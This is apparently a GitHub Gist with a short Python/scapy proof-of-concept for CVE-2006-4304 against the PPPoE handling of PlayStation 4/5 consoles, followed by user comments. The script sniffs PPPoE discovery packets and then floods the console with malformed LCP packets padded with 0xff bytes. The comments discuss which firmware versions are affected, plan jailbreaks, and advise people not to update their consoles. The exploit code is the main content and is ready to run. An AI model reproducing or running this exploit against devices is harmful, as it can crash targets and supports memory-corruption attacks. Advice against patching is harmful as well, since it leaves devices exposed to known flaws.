Skip to content

Instantly share code, notes, and snippets.

@RobbedColek
Created January 30, 2024 16:02
Show Gist options
  • Save RobbedColek/8b0bc9655adc6ad9564ad71453188e37 to your computer and use it in GitHub Desktop.
Save RobbedColek/8b0bc9655adc6ad9564ad71453188e37 to your computer and use it in GitHub Desktop.
PoC of CVE-2006-4304 for PS4/PS5
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump
source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux
packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
packet = sniff(iface=interface, filter="pppoed", count=1)
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
packet = sniff(iface=interface, filter="pppoes", count=1)
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
print(hexdump(packet))
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256 # this number might be different, just a guess
for i in range(20):
sendp(payload, iface=interface)
@8pcd
Copy link

8pcd commented Feb 1, 2024

bro its a poc meaning piece of concept no full jailbreak you have to wait!

@Sergb1970
Copy link

Sergb1970 commented Feb 1, 2024

cable needs straight or reverse?

@MRiCEQB
Copy link

MRiCEQB commented Feb 1, 2024

cable needs straight or reverse?

PS4/5 can do Auto MDI-X, so it doesn't matter.

@lollipop6969
Copy link

proof of concept.

@Drocto1231
Copy link

Will 11.02 be available?

@lewiwiii
Copy link

lewiwiii commented Feb 2, 2024

Will 11.02 be available?

no, this bug has been patched on 11.02

@mbcrump
Copy link

mbcrump commented Feb 6, 2024

I've made a video showing how to set this up from scratch if anyone is interested.

https://www.youtube.com/watch?v=RbGOJGAD0xQ

@unaigonzalezz
Copy link

If anyone is curious, working on PS5 7.61

@sunzhi778
Copy link

零零零零

@mmano87
Copy link

mmano87 commented Mar 2, 2024

I tried it on PS3 and it freezes (sometime) on boot screen.

@mmano87
Copy link

mmano87 commented Mar 2, 2024

Received 2 packets, got 1 answers, remaining 0 packets

@speedyes
Copy link

speedyes commented Apr 9, 2024

works only after setting up PPPoE for the first time or after changing username/password there. but yeah just tested with 11.00 and it does work

@unaigonzalezz
Copy link

We have more info in Hacker One about this vuln, https://hackerone.com/reports/2177925 . Thanks to TheFl0w

@prashantballal1
Copy link

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

@unaigonzalezz
Copy link

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

@MRiCEQB
Copy link

MRiCEQB commented May 7, 2024

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Is it confirmed that it works on both 8.20 versions?

@prashantballal1
Copy link

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Ok I Will Wait _ I am not gonna Update my Console ever

@prashantballal1
Copy link

prashantballal1 commented May 7, 2024

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Is it confirmed that it works on both 8.20 versions?

What You Mean "Works on both 8.20 versions ?" are you asking or telling us ?

@MRiCEQB
Copy link

MRiCEQB commented May 7, 2024

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Is it confirmed that it works on both 8.20 versions?

What You Mean "Works on both 8.20 versions ?" are you asking or telling us ?

I was asking @unaigonzalezz because there are two different 8.20 FW versions.

There is 8.20.00 and there is 8.20.02 like yours.
Unfortunately theflow only said 8.20 which could either mean both or only 8.20.00.

@prashantballal1
Copy link

prashantballal1 commented May 7, 2024

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Is it confirmed that it works on both 8.20 versions?

What You Mean "Works on both 8.20 versions ?" are you asking or telling us ?

I was asking @unaigonzalezz because there are two different 8.20 FW versions.

There is 8.20.00 and there is 8.20.02 like yours. Unfortunately theflow only said 8.20 which could either mean both or only 8.20.00.

Sorry that I didn't know more about jailbreaking stuff, in the past, I used 9.00 for my PS4 Slim version and after a long long time I got one more chance to use Jailbreak, and hopefully TheFlow says 8.20 which includes all the versions

@unaigonzalezz
Copy link

I actually don't know but I if it is .02 it's a small change so I don't think is the error patch, but I'm not truly sure, so the best thing you can guys do is test this script, if it crashes your console, the future exploit should work too.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment